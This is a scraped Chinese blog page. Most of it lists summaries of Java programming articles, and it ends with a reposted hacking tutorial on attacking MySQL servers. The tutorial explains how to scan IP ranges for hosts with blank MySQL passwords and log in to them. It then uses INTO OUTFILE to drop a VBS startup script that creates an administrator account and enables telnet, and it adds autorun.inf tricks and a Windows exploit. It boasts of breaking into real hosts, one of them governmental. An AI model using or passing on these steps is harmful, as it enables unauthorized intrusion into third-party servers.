来源:蜘蛛抓取(WebSpider)
时间:2018-06-22 10:17
标签:
随笔分类 - Java
摘要: https://www.cnblogs.com/taoweiji/archive//2818787.html GridBagLayout是java里面最重要的布局管理器之一,可以做出很复杂的布局,可以说GridBagLayout是必须要学好的的, GridBagLayout 类是
功夫 熊猫 阅读(20) |
摘要: 一、StringBuffer与String的相互转换 1、将StringBuffer转换成String StringBuffer类成员toString函数可将其转换成String类型。 StringBuffer buffer = newStringBuffer(“abcd”); String str
功夫 熊猫 阅读(77) |
摘要: http://www.cnblogs.com/hthuang/p/3460234.html 5、Java-Swing常用布局管理器 应用布局管理器都属于相对布局,各组件位置可随界面大小而相应改变,不变的只是其相对位置,布局管理器比较难以控制,一般只在界面大小需要改是才用,但即使这样,为了操作方便,也
功夫 熊猫 阅读(67) |
摘要: ArrayList和数组间的相互转换 http://wanglihu.iteye.com/blog/243238 ArrayList和数组间的相互转换 http://wanglihu.iteye.com/blog/243238 开发中不免碰到List与数组类型之间的相互转换,举一个简单的例子: Ja
功夫 熊猫 阅读(4800) |
摘要: JList动态添加元素 http://www.cnblogs.com/tianguook/archive//2333992.html https://zhuanlan.zhihu.com/p/ 学Java时用到了JList不知怎么添加元素,这里说说我的经验: Jl
功夫 熊猫 阅读(390) |
摘要: 本文通过实例讲解Java中如何使用ArrayList类。 Java.util.ArrayList类是一个动态数组类型,也就是说,ArrayList对象既有数组的特征,也有链表的特征。可以随时从链表中添加或删除一个元素。ArrayList实现了List接口。 大家知道,数组是静态的,数组被初始化之后,
功夫 熊猫 阅读(675) |
摘要: java提高篇(二一) ArrayList 一、ArrayList概述 ArrayList是实现List接口的动态数组,所谓动态就是它的大小是可变的。实现了所有可选列表操作,并允许包括 null 在内的所有元素。除了实现 List 接口外,此类还提供一些方法来操作内部用来存储列表的数组的大小。 每个
功夫 熊猫 阅读(53) |
摘要: 版权声明:本文为博主原创文章,未经博主允许不得转载。 版权声明:本文为博主原创文章,未经博主允许不得转载。 目录(?)[+] 目录(?)[+] 参考资料: http://.iteye.com/blog/1040329 https://www.java.net/node/650758
功夫 熊猫 阅读(1163) |
摘要: http://www.cnblogs.com/kungfupanda/p/7220217.html GridBagLayout布局管理器应用详解 http://www.cnblogs.com/kungfupanda/p/7220217.html GridBagLayout布局管理器应用详解 很多情况
功夫 熊猫 阅读(83) |
摘要: http://www.cnblogs.com/kissazi2/p/3971065.html Java中的类可以是static吗?答案是可以。在java中我们可以有静态实例变量、静态方法、静态块。类也可以是静态的。 java允许我们在一个类里面定义静态类。比如内部类(nested class)。把n
功夫 熊猫 阅读(6763) |
摘要: http://www.cnblogs.com/hoojo/archive//2134638.html 可扩展标记语言——eXtensible Markup Language 用户可以自己定义语言标记,只要有开始和闭合标签即可。 xsl装饰、修饰xml的显示结果。 dtd约束xml
功夫 熊猫 阅读(78) |
摘要: http://www.cnblogs.com/hoobey/p/5914226.html 1.Collection List Set Map 区别记忆 这些都代表了Java中的集合,这里主要从其元素是否有序,是否可重复来进行区别记忆,以便恰当地使用,当然还存在同步方面的差异,见上一篇相关文章。 有序
功夫 熊猫 阅读(27) |
摘要: http://yyzjava.iteye.com/blog/1181552 很多情况下,我们已经不需要通过编写代码来实现一个应用程序的图形界面,而是通过强大的IDE工具通过拖拽辅以简单的事件处理代码即可很轻松的完成。但是我们不得不面对这样操作存在的一些问题,有时候我们希望能够自由改变一个程序界面的大
功夫 熊猫 阅读(174) |
摘要: ThingCJava type of language function oriented object oriented basic programming unit function class = ADT portability of source code possible with discipline yes portability of compile...
功夫 熊猫 阅读(104) |
摘要: Java集合类: Set、List、Map、Queue使用场景梳理 http://www.cnblogs.com/LittleHann/p/3690187.html 本文主要关注Java编程中涉及到的各种集合类,以及它们的使用场景 相关学习资料 http://files.cnblogs.com/Li
功夫 熊猫 阅读(227) |
摘要: http://www.cnblogs.com/bluestorm/p/6429894.html Java面试宝典 面向对象的三个特征 封装,继承,多态.这个应该是人人皆知.有时候也会加上抽象. 多态的好处 允许不同类对象对同一消息做出响应,即同一消息可以根据发送对象的不同而采用多种不同的行为方式(发
功夫 熊猫 阅读(259) |
摘要: https://www.javacodegeeks.com/2014/03/how-hashmap-works-in-java.html Most common interview questions are “How HashMap works in java”, “How get and put
功夫 熊猫 阅读(16) |
摘要: Both the HashMap and Hashtable implement the interface java.util.Map but there are some slight differences which has to be known to write a much effic
功夫 熊猫 阅读(61) |
摘要: https://www.javainterviewpoint.com/hashmap-works-internally-java/ How a HashMap Works internally has become a popular question in almost all the inter
功夫 熊猫 阅读(52) |
摘要: We are sharing 25 java interview questions , these questions are frequently asked by the recruiters.Java questions can be asked from any core java top
功夫 熊猫 阅读(71) |
摘要: Difference between Vector and Arraylist is the most common Core Java Interview question you will come across in Collection . This question is mostly u
功夫 熊猫 阅读(47) |
摘要: Set 集合是无序不可以重复的的、List 集合是有序可以重复的。 Java 集合:HashSet 与 hashCode、equals 博客里面已经说到这个问题,但是解释的还是不够清楚。 看一个小例子: package mark.import java.util.ArrayLim
功夫 熊猫 阅读(2458) |
摘要: Java ArrayList、Vector和LinkedList等的差别与用法(转) ArrayList 和Vector是采取数组体式格式存储数据,此数组元素数大于实际存储的数据以便增长和插入元素,都容许直接序号索引元素,然则插入数据要设计到数组元素移动等内存操纵,所以索引数据快插入数据慢,Vect
功夫 熊猫 阅读(315) |
摘要: 1.不带类型写法: 1 List listWithoutDup = new ArrayList(new HashSet(listWithDup)); 1 List listWithoutDup = new ArrayList(new HashSet(listWithDup)); 1 List lis
功夫 熊猫 阅读(437) |
摘要: http://www.careerride.com/Swing-AWT-Interview-Questions.aspx Swing interview questions and answers for freshers and experienced candidates. These inte
功夫 熊猫 阅读(61) |
摘要: 创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://zhangjunhd.blog.51cto.com/174 当选择使用JPanel和顶层容器的content pane时,需要考虑布局管理。JPanel缺省是初始化
功夫 熊猫 阅读(970) |
摘要: http://skeletoncoder.blogspot.com/2006/10/jdbc-tutorials-commit-or-rollback.html JDBC Tutorials: Commit or Rollback transaction in finally block In mo
功夫 熊猫 阅读(106) |
摘要: http://blog.segmentfault.com/hlcfan/1407http://www.tuicool.com/articles/fqAzqiJava 和 Python 是当下两种巨火的巨强大的编程语言,对于刚开始学习编程的同学来说,很是迷惑,最经常问得问题就是...
功夫 熊猫 阅读(3667) |
摘要: 对比java和python对比java和python日 1.难易度而言。python远远简单于java。 2.开发速度。Python远优于java 3.运行速度。java远优于标准python,pypy和cython可以追赶java,但是两者都没有成熟到可以做项目的程度。 ...
功夫 熊猫 阅读(79076) |
摘要: -vmargs -Xms128M -Xmx512M -XX:PermSize=64M -XX:MaxPermSize=128M 这里有几个问题:1. 各个参数的含义什么?2. 为什么有的机器我将-Xmx和-XX:MaxPermSize都设置为512M之后Eclipse可以启动,而有些机器无法启动?3. 为何将上面的参数写入到eclipse.ini文件Eclipse没有执行对应的设置?下面我们一一进行回答1. 各个参数的含义什么?参数中-vmargs的意思是设置JVM参数,所以后面的其实都是JVM的参数了,我们首先了解一下JVM内存管理的机制,然后再解释每个参数代表的含义。堆(Heap)和非堆(
功夫 熊猫 阅读(397) |
摘要: 在把jdk安装到计算机中之后,我们来进行设置使java环境能够使用。 首先右键点我的电脑。打开属性。然后选择“高级”里面的“环境变量”,在新的打开界面中的系统变量需要设置三个属性“JAVA_HOME”、“path”、“classpath”,其中在没安装过jdk的环境下。path属性是本来存在的。而JAVA_HOME和classpath是不存在的。 一:点“新建”,然后在变量名写上JAVA_HOME,顾名其意该变量的含义就是java的安装路径,呵呵,然后在变量值写入刚才安装的路径“C:\jdk1.6”。(注:如果安装的路径不是磁盘C或者不是在jdk1.6这个文件夹,可对应修改。以下文字都是假定.
功夫 熊猫 阅读(355) |
摘要: This update site contains the following CDT releases for Ganymede based Eclipse. The Ecilpse Platform Runtime Binary version 3.4 is the minimum required runtime to run CDT 5.0.x.Enter the URL for this site in the update manager to download the CDT featureshttp://download.eclipse.org/tools/cdt/releas
功夫 熊猫 阅读(231) |
摘要: 一般常用格式化类DateFormat和SimpleDateFormat的format(Date time)方法进行格式化日期. 1. 首先介绍java.text.SimpleDateFormat类.public class SimpleDateFormat extends DateFormatSimpleDateFormat是一个以与语言环境有关的方式来格式化和解析日期的具体类。它允许进行格式化(日期 -& 文本)、解析(文本 -& 日期)和规范化。使得可以选择任何用户定义的日期-时间格式的模式。但是,仍然建议通过 DateFormat 中的 getTimeInstance、get
功夫 熊猫 阅读(367) |
摘要: import java.io.*;import java.text.SimpleDateFimport java.util.*;import java.util.logging.Lpublic class AndyLogger{ //The defaulted root path of SSLVPN installation private static String rootPath = &C:\\temp2&; //variable for creating new line private final static String enter =
功夫 熊猫 阅读(451) |
摘要: 恼人的设计模式 最近参加面试,总是被问到设计模式的问题。本人作为一个实用派,完全没搞懂作为一个功能的实现者,设计模式到底有多重要。当然,本人的意思不是说设计模式没用或者不该了解,但是这是一个度的问题,简单的模式,常用的模式,了解并会用,是必然的,但是其他模式,更深层的东西,也许留给架构师来理解更好。毕竟程序员不是架构师,要是程序员懂的知识和架构师一样多,那么,还要架构师来干什么呢? 于此苦闷中,特出来分享一下比较好的设计模式的介绍,以求朋友们能去应付那些蛋疼的笔试。 1、FACTORY——工程模式? 追MM少不了请吃饭了,麦当劳的鸡翅和肯德基的鸡翅都是MM爱吃的东西,虽然口味有所不同...
功夫 熊猫 阅读(336) |
摘要: Java 的1.1 版 本 引 入了 许 多 处 理 字 符(char 型 数 据) 的 类。 这些 新 的 类 能 够 使 得 某 些 具 体 平 台 上 的字 符 转 换 成 为 符 合Unicode 标 准 的 字 符。 文章 主 要 关 注 增 加 了 哪 些 类, 以 及 增 加这 些 字 符 处 理 类 的 动 机。 char类型---- 或 许 在C 语 言 中,最 常 被 滥 用 的 基 本 数 据 类 型 就 是char 类型。 这 一 类 型 常 被 滥 用, 部 分 原 因 是 因为 它 被 定 义 为8 位, 而 在 最 近 的25 年 里,8 个 位 也 就 是 计
功夫 熊猫 阅读(925) |
摘要: C虽说C语言在内存管理方面存在严重的缺陷,不过它还是在某些应用领域里称王称霸。对于那些要求最高的效率,良好的实时性,或者与操作系统内核紧密关联的程序来说,C仍然是很好的选择。C良好的可移植性也为它加了分。不过现在很多其他的语言可移植性越来越好,C在这方面的优势可能会逐渐丧失。现有的很多程序可以产生非常棒的C代码,比如语法分析器、GUI Builder等,这时候C语言也是有吸引力的,因为你所需要编写的代码只是整个程序的一小部分。再有,我们当然应该认识道,C语言对于程序员来说具有无可替代的价值。就我这里讨论的每一种语言而论,只要你发掘的足够深,到最后你会看到它们的内核都是用纯正的、可移植的C写成.
功夫 熊猫 阅读(497) |
摘要: Please help me with this simple problem. I'm trying to create an SSLServerSocket that is enabled with the 2 AES 256-bit cipher suites that are supposed to be available in JDK1.4.2. As you can see in the following code, when the program attempts to enable the SSLServerSocket, ss, with CIPHER_SUIT
功夫 熊猫 阅读(1230) |
摘要: 0.引言 在ChinaITLAB导师制辅导中,笔者发现问得最多的问题莫过于&如何学习编程?Java该如何学习?&。类似的问题回答多了,难免会感觉厌烦,就萌生了写下本文的想法。到时候再有人问起类似的问题,我可以告诉他(她),请你去看看《Java学习之路》。拜读过台湾蔡学镛先生的《Java夜未眠》,有些文章如《Java学习之道》等让我们确实有共鸣,本文题目也由此而来。 软件开发之路是充满荆棘与挑战之路,也是充满希望之路。Java学习也是如此,没有捷径可走。梦想像《天龙八部》中虚竹一样被无崖子醍醐灌顶而轻松获得一甲子功力,是很不现实的。每天仰天大叫&天神啊,请赐给我一本
功夫 熊猫 阅读(390) |
摘要: LDAP操作封装类 作者:廖武锋 MSN: QQ: Email: 本人为作者原创,若转贴,请保留作者署名,谢谢! LDAP操作封装类目标:使用者只需要会使用List,Map 数据结构,将对LDAP的操作进行封装 类:主要有三个类 1 Env类 包含LDAP的连接信息 2 LdapConnectionFactory类 ldap连接工厂,提供初始化及获取ldap连接的方法 3 LdapOperUtils ldap的处理工具类,提供了各种操作ldap的方法。 连接LDAP的连接属性类 Java代码
功夫 熊猫 阅读(127) |
摘要: packagecom.common. importjava.util.P importjavax.naming.C importjavax.naming.NamingE importjavax.naming.directory.DirC importjavax.naming.directory.InitialDirC importorg.apache.log4j.L importorg.apache.commons.lang.StringU /** *功能描述:l
功夫 熊猫 阅读(213) |
摘要: packagecom.common. importjava.util.L
importjava.util.V
/** * *&p&功能描述:ldap的处理类,提供了各种操作ldap的方法。&/p& *@authorliaowufeng *@version1.0 */ publicclassLdapOperUtils{
//调用log4j的日志,用于输出
privatestaticLoggerlog=Logger.getLogger(LdapOperUtils.class.getName());
/** *根据连
功夫 熊猫 阅读(157) |
摘要: /** *在当前连接的DirContext修改指定Context下的一个或多个属性 *@paramcontext连接的DirContext *@paramcn指定Context下的名字 *@paramattMap包含Listkey为属性名称,当属性为多值时 *value为包含多值的List,为单值时,为包含单值的String类型 *@throwsBaseException *@throwsNamingException */ publicstaticvoidmodifyAttributes(DirContextcontext,Stringcn, MapattMap)throws BaseExc
功夫 熊猫 阅读(174) |
摘要: 准备x.509证书首先要下载openssl,我的是win32openssl-0_9_8d.exe,安装后,配置一下环境变量,和jdk配置一样.接下来创建x.509.颜色标识:该颜色表示你要输入的东西第一步:创建私钥(这里输入命令即可)C:\OpenSSL\apps&openssl genrsa -out root/root-key.pem 1024Loading 'screen' into ...
功夫 熊猫 阅读(263) |
摘要: 关于Web Start的JNLP Specification可以到sun网站http://java.sun.com/products/javawebstart/download-spec.html下载。 下面是用最简单的HelloWorld方法实现一个Java Web Start的例子,工程webstart目录结构如下: 目录说明如下:images :存放*.jnlp文件中定义的图标文件 jar ...
功夫 熊猫 阅读(1134) |
摘要: 保证对等机之间的通信安全级别: 初级Todd Sundsted, 首席设计师, PointFire, Inc2001 年 10 月 07 日对任何重要的 P2P 应用程序而言,对等机之间的安全通信都是一个核心要求。尽管安全的细节依赖于如何使用该应用程序和该应用程序将要保护什么,但通过使用现有技术,例如 SSL 实现强壮的、一般用途的安全通常是可能的。本月,Todd Sundsted 演示如何在 P...
功夫 熊猫 阅读(834) |
摘要: 使用 RSA 密钥算法在 JKS 类型的密钥库中创建自签名证书。RSA 是 RSA Data Security, Inc. 开发的公共密钥加密技术。RSA 缩略词分别代表该技术的三位发明者:Rivest、Shamir 和 Adelman。使用 keytool 实用程序生成证书中显示了创建证书的另一个示例。使用默认密钥算法在 JKS 类型的密钥库中创建自签名证书。使用 keytool 实用程序为数字...
功夫 熊猫 阅读(159) |
摘要: jdk工具keytool和jarsigner帮助Part1(jdk keytool&jarsigner tool manual)0.背景keytool是JDK中包含的密钥和证书的管理工具。用于管理私钥及其相关的X.509证书链的keystore。X.509证书链用于认证对应的公钥,keystore类似于一个数据库。同时keytool还用于管理信任实体发布的证书。jarsigner是JDK中...
功夫 熊猫 阅读(513) |
摘要: 大家肯定在安装JDK的时候会有选择是否安装单独的jre,一般都会一起安装,我也建议大家这样做。因为这样更能帮助大家弄清楚它们的区别: Jre 是java runtime environment, 是java程序的运行环境。既然是运行,当然要包含jvm,也就是大家熟悉的虚拟机啦, 还有所有java类库的class文件,都在lib目录下打包成了jar。大家可以自己验证。至于在windows上的虚拟机是...
功夫 熊猫 阅读(427) |
摘要: The Google Plugin for Eclipse is the fastest way to start developing Google Web Toolkit and App Engine applications.It lets you go from installing the plugin to deploying an Ajax "Hello World" in minu...
功夫 熊猫 阅读(267) |
摘要: Installing via EclipsePlease copy the following Update Site URL to your clipboard and then follow the steps listed below to add this URL to your Available Software Sites list. Attempting to access thi...
功夫 熊猫 阅读(1870) |
摘要: 详细请见:Tomcat的帮助文档,:https://localhost:8080/tomcat-docs/ssl-howto.html 。1、用keytool 生成证书: keytool -genkey -alias tomcat -keyalg RSA -keystore c:/tomcat/mykey说明: 这里-alias tomcat 是表示生成的这个证书的别名叫tomcat,-keyal...
功夫 熊猫 阅读(198) |
摘要: The Public-Key Cryptography Standards (PKCS)是由美国RSA数据安全公司及其合作伙伴制定的一组公钥密码学标准,其中包括证书申请、证书更新、证书作废表发布、扩展证书内容以及数字签名、数字信封的格式等方面的一系列相关协议。到1999年底,PKCS已经公布了以下标准: PKCS#1:定义RSA公开密钥算法加密和签名机制,主要用于组织PKCS#7中所描述的数字...
功夫 熊猫 阅读(128) |
摘要: https是通过加密http流量来实现web安全通信.其原理是通过服务器提供其X.509证书声称为服务器的合法代表.它使用的是不对称密钥加密体系由.服务器在证书中提供自身的公钥.客户端在访问页面过程中接收到证书,并用服务器的公钥对http请求加密.再将加密后的密文发送至服务器端,由服务器端负责使用自身的私钥完成解密.一般来说,现在很少有要求客户端提供证书的情形.如何生成证书使用java自带的key...
功夫 熊猫 阅读(251) |
摘要: cer后缀的证书文件有两种编码--&DER二进制编码或者BASE64编码(也就是.pem)p7b一般是证书链,里面包括1到多个证书pfx是指以pkcs#12格式存储的证书和相应私钥。在Security编程中,有几种典型的密码交换信息文件格式:DER-encoded certificate: .cer, .crtPEM-encoded message: .pemPKCS#12 Personal...
功夫 熊猫 阅读(1501) |
摘要: -genkey 在用户主目录中创建一个默认文件".keystore",还会产生一个mykey的别名,mykey中包含用户的公钥、私钥和证书 -alias 产生别名-keystore 指定密钥库的名称(产生的各类信息将不在.keystore文件中-keyalg 指定密钥的算法 -validity 指定创建的证书有效期多少天-keysize 指定密钥长度-storepass 指定密钥库的密码-keyp...
功夫 熊猫 阅读(3726) |
摘要: import java.io.BufferedInputSimport java.io.FileInputSimport java.io.FileOutputSimport java.io.IOEimport java.io.InputSimport java.io.OutputSimp...
功夫 熊猫 阅读(134) |
摘要: 熟悉 Java
的多线程的一般都知道会有数据不一致的情况发生,比如两个线程在操作同一个类变量时,而保护数据不至于错乱的办法就是让方法同步或者代码块同步。同步时非原子操作就得同步,比如一个简单的
运算也该同步,以保证一个代码块或方法成为一个原子操作。简单点说就是给在多线程环境中可能会造成数据破坏的方法,做法有两种,以及一些疑问:1. 不论是静态的或非静态的方法都加上 synchro...
功夫 熊猫 阅读(282) |
摘要: 诊断 Java 代码: 轻松掌握 Java 泛型Java Tiger 版本和 JSR-14 原型编译器中的泛型指南级别: 初级Eric E. Allen (eallen@cs.rice.edu), 博士研究生, Rice 大学 Java 编程语言团队2003 年 5 月 14 日本月的 诊断 Java 代码介绍泛型类型(generic type)和支持它们的特性,计划在 2003 年末发布的 Ti...
功夫 熊猫 阅读(268) |
摘要: JDK 5.0 中增加的泛型类型,是 Java 语言中类型安全的一次重要改进。但是,对于初次使用泛型类型的用户来说,泛型的某些方面看起来可能不容易明白,甚至非常奇怪。在本月的“Java 理论和实践”中,Brian Goetz 分析了束缚第一次使用泛型的用户的常见陷阱。您可以通过讨论论坛与作者和其他读者分享您对本文的看法。(也可以单击本文顶端或底端的讨论来访问这个论坛。)
功夫 熊猫 阅读(113) |
摘要: java范型简介一.简单认识java范型
经常听人说“范型”,我一直不是太明白什么叫“范型”,今天就查阅了一些文章,给我的第一感觉就是之所以在java中用范型,就是为了让一些错误在编译阶段就可以暴露出来,而不用在运行阶段才抛出异常。下面给出一个简单例子来说明。 /** *//** * 没有利用范型的例子 */ public void example...
功夫 熊猫 阅读(366) |
摘要: JFreeChart API文档关键字: 报表 Version 1.0.0-rc2 JFreeChart目前是最好的java图形解决方案,基本能够解决目前的图形方面的需求,主要包括如下几个方面: JFreeChart类: void setAntiAlias(boolean flag)字体模糊边界 void setBackgroundImage(Image image)背景图片 void setBa...
功夫 熊猫 阅读(536) |
摘要: JXM:Monitoring and Management Interface for the Java™ Platform 通过jmx可以监控vm内存使用,系统内存使用等 以下是网上某博客代码,特点是通过window和linux命令获得CPU使用率。Java代码 利用java程序实现获取计算机cpu利用率和内存使用信息。 创建一个Bean用来存贮要得到的信 publicclassMo...
功夫 熊猫 阅读(1235) |
摘要: JAVA开发者最常去的20个英文网站1.[http://www.javaalmanac.com] – Java开发者年鉴一书的在线版本. 要想快速查到某种Java技巧的用法及示例代码, 这是一个不错的去处.2.[http://www.onjava.com] – O’Reilly的Java网站. 每周都有新文章.3.[http://java.sun.com] &#...
功夫 熊猫 阅读(162) |
摘要: Java的核心API是非常庞大的,这给开发者来说带来了很大的方便,经常人有评论,java让程序员变傻。但是一些内容我认为是必须掌握的,否则不可以熟练运用java,也不会使用就很难办了。1、java.lang包下的80%以上的类的功能的灵活运用。2、java.util包下的80%以上的类的灵活运用,特别是集合类体系、正规表达式、时间、属性、和Timer.3、java.io包下的60%以上的类的使用,...
功夫 熊猫 阅读(88) |
摘要: Jad (commercial, no fee for noncommercial use, no source code) http://www.kpdus.com/jad.html* JADO (Free, GPL, not actively maintained) http://sourceforge.net/projects/dcompiler* DJ Java Decompiler ("...
功夫 熊猫 阅读(115) |
摘要: eclipse
功夫 熊猫 阅读(312) |MYSQL攻击全攻略 - 山冈龙 - 博客园
php和js中文化编程的思想让你的梦想自由的飞翔
MYSQL攻击全攻略
最近好象很流行SQL攻击,SQL&Injection的教程有如雨后春笋,不过这里我不谈SQL-SERVER,来谈谈MYSQL吧。SQL-SERVER的空口令管理员往往都很警惕,但MYSQL就不那么敏感了,因为很多管理员认为MYSQL没有SQL-SERVER那样的扩展储存,所以很多网站都疏于防范,这就给了我们的机会,MYSQL+PHP常常被称为完美组合,许多论坛也是这个结构,下面我就是针对IIS+PHP+MYSQL来讨论的,接着往下看吧!&
一、PHP/MySQL简介SQL(结构化查询语言)是世界上最流行和标准化的数据库语言,它使得存储、更新和存取信息更容易。例如,你能用SQL语言为一个网站检索产品信息及存储顾客信息,同时MySQL也足够快速和灵活以允许你存储记录文件和图像。MySQL是一个真正的多用户、多线程SQL数据库服务器。它是以一个客户机/服务器结构的实现,它由一个服务器守护程序mysqld和很多不同的客户程序和库组成。MySQL&主要目标是快速、健壮和易用。MySQL建立的基础是业已用在高要求的生产环境多年的一套实用例程。尽管MySQL仍在开发中,但它已经提供一个丰富和极其有用的功能集。PHP是一种服务器端解释的脚本语言。如果你接触过ASP的话,那么您对于在HTML页面中嵌入代码应该是比较熟悉了。PHP代码在服务器一端被解释转变成普通的HTML页面内容,送给浏览器一端。这种模式使得我们可以用它来完成相当复杂的功能。
二、如何获得MYSQL弱口令的主机相信这是读者们最关心的事情,其实只要利用两个工具就可以轻松搞定。工具:HScan&v1.20MysqlCheckHScan&v1.20运行在Windows&NT/2000/XP&下,其采用多线程方式对指定IP段或主机列表,进行漏洞、弱口令账号、匿名用户检测的工具,扫描项目包括name、port、ftp、ssh、telnet、smtp、finger、iis、cgi、pop、rpc、ipc、imap、mssql、mysql、cisco、plugin...它可以大面积扫出有MYSQL弱口令的主机,我曾经随便扫描了一个C类网段,竟然有为数不少的弱口令主机,还有一个竟然是政府主机,真是令人毛骨悚然。其扫描格式为:hscan&-h&192.168.0.1&192.168.0.254&-ping&-mysql-ping就是扫描前先PING,不过现在ISP供应商大多都封了PING,所有一般不推荐加上这个参数。结果如下:(图1) 此主题相关图片如下:
三、得到弱口令之后的提升权限这里,我们先介绍两个工具:1、牛族SuperMysql连接器&V1.7&傻瓜化的软件特点:1)可以无需安装MYSQL数据库,用SuperMysql连接器可以连接远程MYSQL数据库。2)远程数据库表直接显示在程序的显示框中,无需手工输入指令。3)程序绑定了两个MYSQL指令。修改了两个绑定功能:a)远程更改密码时可以自己定义密码。b)可以自定义创建的远程帐号和密码。2、MYSQL自带连接器虽然是命令行的,但是很稳定哦。上面所说的两个工具都很容易上手,首先来讲讲利用&牛族SuperMysql连接器&V1.7&来得到SHELL吧。下面总结一下网上流行的思路:1)通过漏洞或直觉猜解到Web的物理路径,然后写入ASP或PHP的SHELL,接着提升权限。2)在每个盘符的根目录下写入autorun.inf与一个能建立用户的VBS脚本。3)通过利用Folder.htt,desktop.ini让管理员执行任意命令。4)往启动组内写入建立用户的VBS脚本。这样大家就应该有个底了吧,现在来看实际操作,我首先通过HScan&v1.20得到一所XX信息港的MYSQL密码为空,接着我启动了牛族SuperMysql连接器&V1.7连了上去,如图2所示:
此主题相关图片如下:
#39;返回如图3
此主题相关图片如下:
,结果如图四所示:
此主题相关图片如下:
上传完毕后,我再访问URL:返回如图5所示:
此主题相关图片如下:
图5这样的SHELL就好多了,然后就是提升权限了。先看看可否建立目录:md&c:\&\"Program&File"\shuangfeng结果提示拒绝访问,看来C盘是有权限的拉,接着MD&D:\shuangfeng返回&命令成功完成&。看来D盘是没有权限限制的,然后看看开了什么服务吧,输入&net&start&,我们将会看到该计算机中已经运行的服务。通过分析,我们得出两个有用的服务:MySql、Serv-U&FTP&Server。接下来的思路就很明确了:找到MYSQL或Serv-U的存放地点,然后把木马上传到那个目录,把原启动程序更名,再把木马更改成原启动程序的名字,因为C盘是NTFS的,所有如果放在Program&Files,WINNT等等之类的目录下的话都没有权限更改,仔细看了一下,原来MYSQL和SERV-U都放在Program&Files下,看来是没希望了,不过我们还可以往启动组内写入建立用户的VBS脚本,继续依次提交命令:use&&create&table&2(cmd&TEXT);&insert&into&2&values&("dim&wsh")&&//往名称为2的表里写入VBS代码,然后select&*&from&tmp&into&outfile&"C:\\Documents&and&Settings\\all&users\\「开始」菜单\\程序\\启动\\1.vbs"&drop&table&tmp这里用来将表导出到C:\Documents&and&Settings\all&users\「开始」菜单\程序\启动\1.VBS文件中。(注意所有的"要用""代替)上面要写入的VBS脚本代码如下:dim&wshset&wsh=CreateObject("WScript.Shell")wsh.run&"&net&user&shuangfeng&www.54hack.org&/add&",0wsh.run&"net&localgroup&administrators&shuangfeng&/add",0wsh.run&"net&start&telnet",0重启后将会建立了一个名为shuangfeng,密码是www.54hack.org的用户了,并且开了telnet。如果速度快的话可以利用一下MS03043漏洞,重启后就TELNET上去.如果读者们不能象我一样幸运但可以看到物理路径的话就只能猜咯。再来讲讲利用MYSQL自带的连接器入侵吧,首先当然是先连接咯,在CMD里输入:mysql&-h&ip&-u用户名&-p密码这样就可以连接到对方的MYSQL,连接上去后就可以输入像上面一样输入命令,不过这样一行一行输入好象很烦琐,我们可以制作一个SQL脚本来一次完成,制作过程如下:1.首先打开记事本,把要运行的SQL语句都打上去,这里我输入:use&create&table&tmp(cmd&TEXT)insert&into&2&values&("dim&wsh")insert&into&2&values&("set&wsh=CreateObject(""WScript.Shell"")")insert&into&2&values&("wsh.run&""net.exe&user&aaa&aa&/add"",0")insert&into&2&values&("wsh.run&""net&localgroup&administrators&aaa&/add"",0")insert&into&2&values&("wsh.run&"net&start&telnet",0")select&*&from&tmp&into&outfile&"C:\\Documents&and&Settings\\all&users\\「开始」菜单\\程序\\启动\\1.vbs"drop&table&tmp然后保存为shuangfeng.sql,再在CMD里输入:mysql&-h&ip&-u用户名&-p密码&&&shuangfeng.sql回车后,就自动输入上面的语句了,如果在每行代码前都添加&insert&into&tmp&values(&&,末尾都添加&&)&的话,工程量是可想而知的,所以我就用了一个特殊文本编辑器--易优超级字典生成器注册版,它有一个小功能,在&修改字典&里,如图6有两个选项,一个是&在每个密码前插入字符串&另一个是&在每个密码后插入字符串&不过由于版面的原因,我这就不再告诉怎么用了,大家自己研究一下吧!不过注意所有的"都要用""代替。如果要用autorun.inf与VBS来执行命令的话,就用上面的方法把autorun.inf和VBS导出到各个盘的根目录吧,autorun.inf如下:[AutoRun]OPEN=&2.vbsVBS脚本代码就跟2.VBS一样,剩下的就是等管理员上勾了,
random把此帖设为精华,作者得到1000可用分50分专家分:)
随笔 - 332
